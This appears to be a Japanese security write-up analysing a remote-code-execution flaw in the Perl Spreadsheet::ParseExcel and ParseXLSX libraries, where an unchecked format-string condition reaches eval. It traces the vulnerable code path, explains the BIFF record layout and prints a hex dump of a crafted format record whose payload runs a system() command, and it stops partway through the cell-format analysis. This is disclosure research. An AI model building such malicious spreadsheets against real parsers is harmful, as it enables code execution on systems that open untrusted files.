
ParseExcelライブラリのRCE脆弱性、および依存ライブラリとしてのParseXLSXのRCE脆弱性のPOC。
TL;DR: フォーマット文字列の解析ロジックに起因するRCE。
この脆弱性の根本原因は、Utility.pm 内で検証されていないユーザー入力を eval に渡していることです。
# Uitlity.pm
sub ExcelFmt {
my ( $format_str, $number, $is_1904, $number_type, $want_subformats ) = @_;
return $number unless $number =~ $qrNUMBER;
my $conditional;
if ( $format_str =~ /^\[([<>=][^\]]+)\](.*)$/ ) {
$conditional = $1;
$format_str = $2;
}
#...
if ($conditional) {
# TODO. Replace string eval with a function.
$section = eval "$number $conditional" ? 0 : 1;
}
#...
}
調査したところ、このフローに対する現在の実装には適切な検証がなく、比較ロジックの処理に eval を使うのはこのケースでは「やりすぎ」です。このため、Excel ファイルからデータを読み取るために使われる ParseExcel::parse と ParseXLSX::parse の両方が RCE に対して脆弱です。
$format_str はどこにあるか?ValFmt が ExcelFmt の最も可能性の高い呼び出し元なので、このメソッドについてさらに詳しく説明します。
https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L141-L161
sub ValFmt {
my ( $oThis, $oCell, $oBook ) = @_;
my ( $Dt, $iFmtIdx, $iNumeric, $Flg1904 );
if ( $oCell->{Type} eq 'Text' ) {
$Dt =
( ( defined $oCell->{Val} ) && ( $oCell->{Val} ne '' ) )
? $oThis->TextFmt( $oCell->{Val}, $oCell->{Code} ) # Perform some encoding logic => doesn't cause RCE
: '';
return $Dt;
}
else {
$Dt = $oCell->{Val};
$Flg1904 = $oBook->{Flg1904};
my $sFmtStr = $oThis->FmtString( $oCell, $oBook );
# where RCE lies => $oCell->{Type} must be either "Date" or "Number"
return ExcelFmt( $sFmtStr, $Dt, $Flg1904, $oCell->{Type} );
}
}
$oCell->{Type} が Date または Number の場合、ExcelFmt が呼び出されます。
$format_str の値は、別のメソッド FmtString から返されたものです。
https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L101-L136
sub FmtString {
my ( $oThis, $oCell, $oBook ) = @_;
my $sFmtStr =
$oThis->FmtStringDef( $oBook->{Format}[ $oCell->{FormatNo} ]->{FmtIdx},
$oBook ); # maps to the correct format string
#...
unless ( defined($sFmtStr) ) {
# assigns default format string depending on the value, can ignore
#...
}
return $sFmtStr;
}
もう1つの関数が呼び出されているので、FmtStringDef も確認します。
https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L87-L96
sub FmtStringDef {
my ( $oThis, $iFmtIdx, $oBook, $rhFmt ) = @_;
my $sFmtStr = $oBook->{FormatStr}->{$iFmtIdx}; # does the mapping
# More with assigning default format string, can ignore
#...
}
すべての変数が明らかになったので、攻撃ベクトルは次のように結論付けられます:
$iFmtIdx で悪意のあるフォーマット文字列を注入する$oBook->{Format}[$cellFmtIdx] が $iFmtIdx にマップされるようにする$oCell->{FormatNo} = $cellFmtIdx)
![[flow 1.png]]以下のセクションでは、ペイロードがシェルコードを eval コマンドまで伝播させた仕組みを詳しく説明します。ParseExcel を使用した .xls ファイルの解析と、ParseXLSX を使用した .xlsx ファイルの解析の2つのセクションがあります。
デモとして、whoami を実行し結果を /tmp/inject.txt ファイルに保存する、私たちが作成した悪意のある Excel ファイル(.xls および .xlsx)へのリンクを以下に示します。
https://gist.github.com/haile01/0f4f19e4441895ef33ff27385080478b
以下のような ParseExcel::parse を使用する単純な Perl プログラムで xls ファイルを解析するとします。RCE はデータが取得される前、解析の実行中に発生します。
use strict;
use Spreadsheet::ParseExcel;
my $parser = Spreadsheet::ParseExcel->new();
# file.xls is malicious file from end user
my $workbook = $parser->parse("test.xls");
Excel 97 バイナリファイルは、BIFF レコードと呼ばれるバイナリデータのチャンクで構成されています。各レコードは opCode(リトルエンディアン)と呼ばれるヘッダーで始まり、その後にレコードの長さと実際のデータが続きます。
sub QueryNext {
my ( $q ) = @_;
if ( $q->{streamPos} + 4 >= $q->{streamLen} ) {
return 0;
}
my $data = substr( $q->{stream}, $q->{streamPos}, 4 );
( $q->{opcode}, $q->{length} ) = unpack( 'v2', $data );
# No biff record should be larger than around 20,000.
if ( $q->{length} >= 20000 ) {
return 0;
}
if ( $q->{length} > 0 ) {
$q->{data} = substr( $q->{stream}, $q->{streamPos} + 4, $q->{length} );
}
else {
$q->{data} = undef;
$q->{dont_decrypt_next_record} = 1;
}
if ( $q->{encryption} == MS_BIFF_CRYPTO_RC4 ) {
# Handles with decryption
}
elsif ( $q->{encryption} == MS_BIFF_CRYPTO_XOR ) {
# not implemented
return 0;
}
elsif ( $q->{encryption} == MS_BIFF_CRYPTO_NONE ) {
}
$q->{streamPos} += 4 + $q->{length};
return 1;
}
その後、レコードタイプに対応するハンドラが使用され、その BIFF レコードのデータが抽出されます。 https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L576-L580
if ( defined $self->{FuncTbl}->{$record} && !$workbook->{_skip_chart} )
{
$self->{FuncTbl}->{$record}
->( $workbook, $record, $record_length, $record_header );
}
フォーマット文字列は opCode = 0x41E の _subFormat によって処理されます。
https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L1563-L1585
sub _subFormat {
my ( $oBook, $bOp, $bLen, $sWk ) = @_;
my $sFmt;
if ( $oBook->{BIFFVersion} <= verBIFF5 ) {
$sFmt = substr( $sWk, 3, unpack( 'c', substr( $sWk, 2, 1 ) ) );
$sFmt = $oBook->{FmtClass}->TextFmt( $sFmt, '_native_' );
}
else {
$sFmt = _convBIFF8String( $oBook, substr( $sWk, 2 ) );
}
my $format_index = unpack( 'v', substr( $sWk, 0, 2 ) );
# Excel 4 and earlier used an index of 0 to indicate that a built-in format
# that was stored implicitly.
if ( $oBook->{BIFFVersion} <= verBIFF4 && $format_index == 0 ) {
$format_index = keys %{ $oBook->{FormatStr} };
}
$oBook->{FormatStr}->{$format_index} = $sFmt;
}
自分の .xls ファイルで使用されている BIFF バージョンがどれか確信はありませんでしたが、バイナリファイル内のデータによると、else ケース(> verBIFF5)に一致するはずです。
新しい BIFF バージョンでのフォーマット文字列レコードの構造は次のようになります。 1E 04 [record length - 2 bytes] [format string index - 2 bytes] [format string length - 1 byte] [string flags - 2 bytes] [format string content]
正しい構造に従うことで、任意のフォーマット文字列を .xls ファイルに注入できます。
PoC で注入したフォーマット文字列の実際の BIFF レコード(フォーマット文字列インデックスは \x00\xa5)
00000000: 1e04 3100 a500 2c00 005b 3e31 3233 3b73 ..1...,..[>123;s
^^^^
format string index
00000010: 7973 7465 6d28 2777 686f 616d 6920 3e20 ystem('whoami >
00000020: 2f74 6d70 2f69 6e6a 6563 742e 7478 7427 /tmp/inject.txt'
00000030: 295d 3132 33 )]123
セルフォーマットは、フォーマット文字列、スタイリング、フォントなど、セルの多くのプロパティを定義します。1つのセルフォーマットは、BIFF レコード内にフォーマット文字列のインデックスを含めることで、1つのフォーマット文字列にリンクできます。このロジックは _subXf によって処理されます。
https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L1441-L1558
sub _subXF {
my ( $oBook, $bOp, $bLen, $sWk ) = @_;
#...
if ( $oBook->{BIFFVersion} == verBIFF4 ) {
#...
}
elsif ( $oBook->{BIFFVersion} == verBIFF8 ) {
my ( $iGen, $iAlign, $iGen2, $iBdr1, $iBdr2, $iBdr3, $iPtn );
( $iFnt, $iIdx, $iGen, $iAlign, $iGen2, $iBdr1, $iBdr2, $iBdr3, $iPtn )
= unpack( "v7Vv", $sWk );
#...
}
else {
( $iFnt, $iIdx, $iGen, $iAlign, $iPtn, $iPtn2, $iBdr1, $iBdr2 ) =
unpack( "v8", $sWk );
#...
}